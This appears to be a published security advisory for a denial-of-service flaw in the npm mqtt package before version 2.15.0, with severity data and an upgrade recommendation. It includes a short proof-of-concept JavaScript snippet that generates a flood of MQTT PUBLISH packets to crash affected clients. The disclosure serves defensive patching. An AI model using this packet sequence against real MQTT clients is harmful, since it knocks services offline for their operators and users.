GHSA-h9mj-fghc-664w

Suggest an improvement
Source
https://github.com/advisories/GHSA-h9mj-fghc-664w
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/12/GHSA-h9mj-fghc-664w/GHSA-h9mj-fghc-664w.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-h9mj-fghc-664w
Aliases
Published
2017-12-28T22:51:58Z
Modified
2023-11-08T03:58:48Z
Severity
  • 6.5 (Medium) CVSS_V3 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
Summary
Denial of Service in mqtt
Details

Affected versions of mqtt do not properly handle PUBLISH packets returning from the server, leading to a Denial of Service condition.

The vulnerability is completely mitigated if the only connected servers are trusted, guaranteed not to be under the control of a malicious actor.

Proof of Concept

The following is a demonstration of how to generate the malicious packet sequence, but does not include information on handling the initial network connections and MQTT overhead.

var mqttp = require('mqtt-packet');
var packets = [];
for(var i=0; i<=1000;i++){
    packets.push(
        mqttp.generate({
            cmd:'publish',
            topic:Buffer.from('hello'),
            payload:Buffer.from('world'),
            retain: false,
            dup: false, 
            messageId: ++i, 
            qos: 1
        })
    )
}

Recommendation

Update to version 2.15.0 or later.

Database specific
{
    "cwe_ids":  [
        "CWE-674"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2020-06-16T21:39:48Z",
    "nvd_published_at":  null,
    "severity":  "MODERATE"
}
References

Affected packages

npm / mqtt

Package

Affected ranges

Type
SEMVER
Events
Introduced
2.0.0
Fixed
2.15.0

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/12/GHSA-h9mj-fghc-664w/GHSA-h9mj-fghc-664w.json"